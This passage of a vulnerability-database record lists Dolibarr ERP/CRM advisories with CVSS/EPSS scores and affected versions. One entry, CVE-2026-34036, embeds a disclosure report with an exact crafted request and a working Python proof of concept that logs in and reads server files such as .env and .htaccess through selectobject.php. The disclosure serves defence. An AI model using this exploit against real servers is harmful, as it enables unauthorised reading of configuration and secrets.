9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-tmv2-39y8-f7f1 |
|
| 52 |
| url |
VCID-tsbf-m4eq-gbgp |
| vulnerability_id |
VCID-tsbf-m4eq-gbgp |
| summary |
Dolibarr ERP CRM Code Injection vulnerability during installation
Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
6.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
|
| 2 |
| value |
MODERATE |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2024-29477, GHSA-p73x-rpgm-3v56
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
7.9 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-tsbf-m4eq-gbgp |
|
| 53 |
| url |
VCID-uzz6-3bze-mbez |
| vulnerability_id |
VCID-uzz6-3bze-mbez |
| summary |
SQL Injection vulnerability in Dolibarr allows remote attackers to execute arbitrary SQL commands via the `sortfield` parameter to `/accountancy/admin/accountmodel.php`, `/accountancy/admin/categories_list.php`, `/accountancy/admin/journals_list.php`, `/admin/dict.php`, `/admin/mails_templates.php`, or `/admin/website.php.` |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-9019 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83961 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83982 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83986 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.01997 |
| scoring_system |
epss |
| scoring_elements |
0.83983 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-9019 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-9019, GHSA-fff9-m6f6-q3mh
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-uzz6-3bze-mbez |
|
| 54 |
| url |
VCID-v5bc-wjmv-ubhx |
| vulnerability_id |
VCID-v5bc-wjmv-ubhx |
| summary |
Command Injection
The admin panel in Dolibarr might allow remote attackers to execute arbitrary commands by leveraging support for updating the antivirus command and parameters used to scan file uploads. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10092 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62613 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62658 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62668 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00426 |
| scoring_system |
epss |
| scoring_elements |
0.62659 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10092 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-10092, GHSA-6j62-m2vv-wc3m
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-v5bc-wjmv-ubhx |
|
| 55 |
| url |
VCID-v9g8-u2uq-7yff |
| vulnerability_id |
VCID-v9g8-u2uq-7yff |
| summary |
Improper Authorization in dolibarr/dolibarr
An Improper Authorization vulnerability exists in Dolibarr versions prior to version 15.0.0. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-3991 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16414 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16377 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16458 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.00051 |
| scoring_system |
epss |
| scoring_elements |
0.16457 |
| published_at |
2026-06-06T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-3991 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
|
| aliases |
CVE-2021-3991, GHSA-wppr-j57c-8jpm
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-v9g8-u2uq-7yff |
|
| 56 |
| url |
VCID-vp4z-qpc7-uug1 |
| vulnerability_id |
VCID-vp4z-qpc7-uug1 |
| summary |
Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php
# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure
## Target
Dolibarr Core (Tested on version 22.0.4)
## Summary
A Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).
## Vulnerability Details
The vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.
- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.
- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.
This allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.
## Steps to Reproduce
- Log in to the Dolibarr instance with any user account (no specific permissions required).
- Intercept or manually forge a GET request to the following endpoint:
```
GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0
```
- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.
- *(Optional)* Run the attached Python PoC to automate the extraction:
```
python3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess
```
## Impact
An attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.
## Suggested Mitigation
- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.
- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.
- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.
## Disclosure Policy & Assistance
The reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.
Should any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.
Thank you for the time and commitment to securing Dolibarr.
Best Regards,
Vincent KHAYAT (cnf409)
## Video PoC
https://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844
## PoC Script
```python
#!/usr/bin/env python3
"""Dolibarr selectobject.php authenticated LFI PoC"""
import argparse
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
LOGIN_MARKERS = ("Login @", "Identifiant @")
LOGOUT_MARKERS = ("/user/logout.php", "Logout", "Mon tableau de bord")
def request(
opener, base_url, method, path, params=None, data=None, timeout=15
):
url = f"{base_url.rstrip('/')}{path}"
if params:
url = f"{url}?{urllib.parse.urlencode(params)}"
payload = urllib.parse.urlencode(data).encode("utf-8") if data else None
req = urllib.request.Request(url, method=method.upper(), data=payload)
req.add_header("User-Agent", "dolibarr-lfi-poc/1.0-securitytest-for-dolibarr")
req.add_header("Accept", "text/html,application/xhtml+xml")
try:
with opener.open(req, timeout=timeout) as resp:
return resp.status, resp.read().decode("utf-8", errors="replace")
except urllib.error.HTTPError as err:
return err.code, err.read().decode("utf-8", errors="replace")
def extract_login_token(page):
for pattern in (
r'name=["\']token["\']\s+value=["\']([^"\']*)["\']',
r'name=["\']anti-csrf-newtoken["\']\s+content=["\']([^"\']*)["\']',
):
match = re.search(pattern, page, flags=re.IGNORECASE)
if match:
return match.group(1)
return ""
def looks_authenticated(body):
return any(marker in body for marker in LOGOUT_MARKERS)
def clean_included_output(body):
for marker in (
"<br />\n<b>Warning",
"<br />\r\n<b>Warning",
"<br />\n<b>Fatal error",
"<br />\r\n<b>Fatal error",
):
pos = body.find(marker)
if pos != -1:
return body[:pos].rstrip()
return body.rstrip()
def login(opener, base_url, username, password):
code, login_page = request(opener, base_url, "GET", "/")
if code >= 400:
return False, f"HTTP {code} on login page"
token = extract_login_token(login_page)
code, after_login = request(
opener,
base_url,
"POST",
"/index.php?mainmenu=home",
data={
"token": token,
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": username,
"password": password,
},
)
if code >= 400:
return False, f"HTTP {code} on login request"
if looks_authenticated(after_login):
return True, ""
code, home = request(opener, base_url, "GET", "/index.php?mainmenu=home")
if code < 400 and looks_authenticated(home):
return True, ""
return False, "Invalid username or password"
def read_file(opener, base_url, relative_path):
status, body = request(
opener,
base_url,
"GET",
"/core/ajax/selectobject.php",
params={
"outjson": "0",
"htmlname": "x",
"objectdesc": f"A:{relative_path}:0",
},
)
if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):
raise RuntimeError("Session expired or not authenticated")
return status, body, clean_included_output(body)
def parse_args():
parser = argparse.ArgumentParser(
description="Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4)."
)
parser.add_argument(
"--url",
default="http://127.0.0.1:8080",
help="Dolibarr base URL (default: http://127.0.0.1:8080)",
)
parser.add_argument("--username", required=True, help="Dolibarr username")
parser.add_argument("--password", required=True, help="Dolibarr password")
parser.add_argument(
"--file",
dest="target_file",
required=True,
help="Target file to read (e.g. conf/.htaccess).",
)
return parser.parse_args()
def print_result(path, status, raw, clean):
print(f"\n[+] HTTP status: {status}")
print(f"[+] Requested file: {path}")
print("=" * 80)
if clean:
print(html.unescape(clean))
else:
print("(No readable output extracted)")
print("=" * 80)
if clean != raw.rstrip():
print("[i] PHP warnings/fatal output were trimmed from display.")
def summarize_error_body(body, limit=1200):
text = html.unescape(body).strip()
if not text:
return "(Empty response body)"
if len(text) > limit:
return text[:limit].rstrip() + "\n... [truncated]"
return text
def main():
args = parse_args()
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(CookieJar())
)
ok, reason = login(opener, args.url, args.username, args.password)
if not ok:
print(f"[!] {reason}")
return 1
print("[+] Login successful.")
try:
status, raw, clean = read_file(opener, args.url, args.target_file)
if status >= 400:
print(f"[!] HTTP {status} while reading target file.")
print("=" * 80)
print(summarize_error_body(raw))
print("=" * 80)
return 1
print_result(args.target_file, status, raw, clean)
return 0
except Exception as exc:
print(f"[!] Error: {exc}")
return 1
if __name__ == "__main__":
try:
raise SystemExit(main())
except KeyboardInterrupt:
print("\nInterrupted.")
raise SystemExit(130)
``` |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-34036, GHSA-2mfj-r695-5h9r
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vp4z-qpc7-uug1 |
|
| 57 |
| url |
VCID-vwxd-syyk-jueh |
| vulnerability_id |
VCID-vwxd-syyk-jueh |
| summary |
Dolibarr Improper Input Validation vulnerability
Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-4197, GHSA-r9cm-pw9j-3fpx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vwxd-syyk-jueh |
|
| 58 |
| url |
VCID-w7ww-nq62-e7b1 |
| vulnerability_id |
VCID-w7ww-nq62-e7b1 |
| summary |
Dolibarr ERP CRM vulnerable to remote code execution (RCE)
Dolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
5.5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N |
|
| 1 |
| value |
7.0 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
| reference_url |
https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137 |
| reference_id |
CVE-2024-40137 |
| reference_type |
|
| scores |
| 0 |
| value |
5.5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N |
|
| 1 |
| value |
7.0 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/ |
|
|
| url |
https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
|
| aliases |
CVE-2024-40137, GHSA-vprp-94p9-5jp8
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-w7ww-nq62-e7b1 |
|
| 59 |
| url |
VCID-yn53-kazm-1ugc |
| vulnerability_id |
VCID-yn53-kazm-1ugc |
| summary |
An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.0,in the forgot-password function because the application allows email addresses as usernames, which can cause a Denial of Service. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-37517 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.58193 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.58239 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.5825 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00356 |
| scoring_system |
epss |
| scoring_elements |
0.58242 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-37517 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 6 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 7 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 8 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 9 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 10 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 11 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 12 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 13 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 14 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 15 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 16 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 17 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 18 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 19 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 20 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 21 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 22 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 23 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 24 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 25 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 26 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 27 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 28 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 29 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 30 |
| vulnerability |
